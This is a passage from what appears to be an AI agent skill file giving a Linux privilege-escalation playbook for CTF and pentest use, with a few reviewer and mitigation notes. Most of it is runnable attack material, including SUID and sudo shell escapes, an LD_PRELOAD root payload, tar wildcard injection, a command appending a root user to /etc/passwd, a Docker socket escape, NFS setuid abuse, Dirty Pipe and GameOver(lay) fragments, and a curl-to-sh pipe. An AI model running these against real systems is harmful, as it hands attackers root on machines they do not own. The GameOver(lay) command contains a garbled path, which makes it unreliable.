Linux Privilege Escalation
When to Activate
- Gained initial shell on Linux target, need root
- Post-exploitation privilege escalation
- Container escape scenarios
- CTF challenges requiring privesc
Automated Enumeration
# LinPEAS
# NOTE(review): this pipes a script fetched over the network straight into sh,
# so whatever the remote host serves is executed unread; fetch it to a file and
# inspect/verify it before running.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Linux Exploit Suggester
./linux-exploit-suggester.sh
# pspy (process monitoring without root)
./pspy64
Manual Enumeration
System Info
uname -a # Kernel version
cat /etc/os-release # OS version
id # Current user/groups
env # Environment variables
cat /etc/passwd # Users
cat /etc/crontab # Cron jobs
ls -la /etc/cron* # All cron directories
mount # Mounted filesystems
df -h # Disk usage
ip addr / ifconfig # Network interfaces
netstat -tulpn / ss -tulpn # Listening services
ps aux # Running processes
SUID/SGID Binaries
find / -perm -4000 -type f 2>/dev/null # SUID
find / -perm -2000 -type f 2>/dev/null # SGID
# Check GTFOBins for each:
# https://gtfobins.github.io/#+suid
# Common exploitable SUID:
# - /usr/bin/find → find . -exec /bin/sh -p \;
# - /usr/bin/vim → vim -c ':!/bin/sh'
# - /usr/bin/python3 → python3 -c 'import os;os.execl("/bin/sh","sh","-p")'
# - /usr/bin/env → env /bin/sh -p
# - /usr/bin/nmap (old) → nmap --interactive → !sh
# Mitigation: none of the interpreters/editors listed above need a setuid bit.
# Compare the find output against a known-good baseline, strip unexpected bits
# (chmod u-s), and mount user-writable filesystems with nosuid.
Capabilities
getcap -r / 2>/dev/null
# Exploitable capabilities:
# cap_setuid+ep → set UID to 0
# python3: python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
# cap_dac_read_search → read any file
# cap_net_raw → packet sniffing
# cap_sys_admin → mount filesystems, abuse cgroups
# cap_sys_ptrace → inject into processes
Sudo
sudo -l # List allowed commands
# Exploitable sudo entries:
# (ALL) NOPASSWD: /usr/bin/vim → :!/bin/sh
# (ALL) NOPASSWD: /usr/bin/less → !/bin/sh
# (ALL) NOPASSWD: /usr/bin/awk → awk 'BEGIN {system("/bin/sh")}'
# (ALL) NOPASSWD: /usr/bin/find → find . -exec /bin/sh \;
# (ALL) NOPASSWD: /usr/bin/python3 → python3 -c 'import pty;pty.spawn("/bin/bash")'
# (ALL) NOPASSWD: /usr/bin/env → env /bin/sh
# (ALL) NOPASSWD: /usr/bin/perl → perl -e 'exec "/bin/sh"'
# LD_PRELOAD (if env_keep+=LD_PRELOAD in sudoers)
# Compile: gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
# pe.c: void _init() { setuid(0); system("/bin/bash -p"); }
# sudo LD_PRELOAD=/tmp/pe.so /allowed/command
Cron Jobs
cat /etc/crontab
ls -la /etc/cron.d/
crontab -l
# Check for writable scripts called by root cron
# Check for wildcard injection (tar, rsync with *)
# Wildcard injection (tar):
# If cron runs: tar czf /backup/backup.tar.gz *
# Create: --checkpoint=1 --checkpoint-action=exec=sh shell.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash" > shell.sh
Writable Files/Paths
# Writable /etc/passwd
echo 'hacker:$(openssl passwd -1 pass123):0:0::/root:/bin/bash' >> /etc/passwd
# Writable service files
find /etc/systemd/system -writable -type f 2>/dev/null
# Modify ExecStart to reverse shell
# Writable PATH directories
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type d 2>/dev/null
# Place malicious binary with name of command run by root
# Writable library paths
find / -writable -name "*.so" 2>/dev/null
ldconfig -v 2>/dev/null | grep -v "^$"
Kernel Exploits
uname -r
# Search: searchsploit linux kernel $(uname -r | cut -d'-' -f1)
# NOTE: distribution kernels backport fixes without changing the upstream
# version string, so a version match here only means "possibly affected";
# confirm against the distro's security advisory / package changelog.
# Notable kernel exploits:
# DirtyPipe (CVE-2022-0847) — Linux 5.8-5.16.11
# DirtyCow (CVE-2016-5195) — Linux 2.6.22-4.8.3
# PwnKit (CVE-2021-4034) — pkexec, almost all Linux
# Sequoia (CVE-2021-33909) — filesystem layer, most kernels
# GameOver(lay) (CVE-2023-2640) — Ubuntu OverlayFS
Docker/Container Escape
# Check if in container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv
# Both checks are heuristics: on cgroup v2 hosts /proc/1/cgroup typically shows
# only "0::/" inside a container, and /.dockerenv is Docker-specific (absent
# under other runtimes) — treat a negative result as inconclusive.
# Docker socket mounted
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
# Mitigation: a bind-mounted Docker socket is equivalent to root on the host;
# do not mount it into containers, or front it with a restricted proxy.
# Privileged container
fdisk -l # can see host disks
mount /dev/sda1 /mnt && chroot /mnt
# Cap SYS_ADMIN + apparmor=unconfined
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
# Then abuse release_agent for host command execution
# CVE-2019-5736 (runc overwrite)
# Overwrite /usr/bin/runc on host via /proc/self/exe
NFS
showmount -e $TARGET
# If no_root_squash is set:
# Mount share, create SUID binary as root, execute on target
mount -t nfs $TARGET:/share /mnt
cp /bin/bash /mnt/rootbash && chmod +s /mnt/rootbash
# On target: /share/rootbash -p
# ($TARGET above is a placeholder for the NFS server and is expanded unquoted;
# it must be set before use.) Mitigation: keep the default root_squash on
# exports, and mount shares with nosuid on clients so setuid bits on share
# contents are ignored.
Advanced: Kernel Exploitation
Dirty Pipe (CVE-2022-0847)
// Overwrite any file the attacker can open for reading, regardless of write
// permissions — Linux 5.8 to 5.16.11
// Exploit: splice() into pipe → write over page cache → modifies file
// Usage: overwrite /etc/passwd to add root user
// Or: overwrite SUID binary with custom code
// Or: overwrite /usr/bin/su with shell that drops to root
// NOTE(review): illustrative fragment only — buf, offset and PAGE_SIZE are not
// declared here and the calls sit at file scope, so this does not compile as-is.
#include <unistd.h>
#include <fcntl.h>
// 1. Open target file (read-only is fine)
int fd = open("/etc/passwd", O_RDONLY);
// 2. Create pipe, fill and drain (set PIPE_BUF_FLAG_CAN_MERGE)
int pipefd[2]; pipe(pipefd);
write(pipefd[1], buf, PAGE_SIZE); // fill pipe
read(pipefd[0], buf, PAGE_SIZE); // drain pipe
// 3. Splice target file into pipe (references page cache)
splice(fd, &offset, pipefd[1], NULL, 1, 0);
// 4. Write to pipe — overwrites page cache (and the file)
write(pipefd[1], "root::0:0::/root:/bin/bash\n", 27);
GameOver(lay) (CVE-2023-2640 + CVE-2023-32629)
# Ubuntu-specific OverlayFS privilege escalation
# Exploit: set trusted.overlay.metacopy xattr on file in overlay
# Kernel treats it as privileged overlay metadata
unshare -rm sh -c "
mkdir l u w m &&
cp /u*/b*/p]asswd l/
setcap cap_setuid+eip l/passwd &&
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &&
touch m/--hierarchical &&
u/passwd
"
# Result: arbitrary capabilities on arbitrary files → root
Dirty Cred (CVE-2022-2588)
// Swap kernel credentials by exploiting object reuse in SLAB allocator
// When cred structure is freed and reallocated, attacker controls new cred
// Works across kernel versions — generic technique
// Strategy:
// 1. Trigger vulnerability that frees a credential object
// 2. Spray the slab cache with controlled objects of same size
// 3. Object reuse → attacker's data interpreted as credentials
// 4. Kernel uses corrupted cred → privilege escalation
eBPF Exploitation
# eBPF programs run in kernel — vulnerabilities = kernel code execution
# Common eBPF vulnerabilities:
# - Verifier bypass → arbitrary kernel read/write
# - Type confusion in BPF maps
# - OOB access via crafted BPF programs
# CVE-2021-31440: eBPF verifier bounds tracking issue
# CVE-2021-3490: eBPF ALU32 bounds tracking
# CVE-2023-2163: eBPF verifier range tracking
# Check if unprivileged BPF is allowed:
cat /proc/sys/kernel/unprivileged_bpf_disabled
# 0 = unprivileged users can load BPF programs (exploitable)
# 1 = restricted to CAP_BPF/CAP_SYS_ADMIN
# (The sysctl also accepts 2 — disabled but root can set it back to 0; 1 cannot
# be changed back without a reboot, so 1 is the hardened choice — confirm
# against the running kernel's sysctl documentation.)
Netfilter / nftables Exploitation
# Linux firewall subsystem runs in kernel — bugs = root
# CVE-2022-25636 (nft_fwd_dup_netdev_offload OOB write)
# CVE-2023-0179 (nftables stack buffer overflow)
# CVE-2023-32233 (nf_tables use-after-free)
# CVE-2024-1086 (nf_tables double-free)
# CVE-2024-1086 exploit:
# User namespace + nftables → double-free in page allocator
# Spray + overwrite page table entries → arbitrary kernel R/W
# Modify current task's credentials → root
# Works on kernels 5.14 to 6.6 (wide coverage)
Advanced: Namespace & Container Breakout
User Namespace Escalation
# User namespaces allow unprivileged users to get "root" inside namespace
# Combine with kernel bugs for real root:
# Create user namespace wit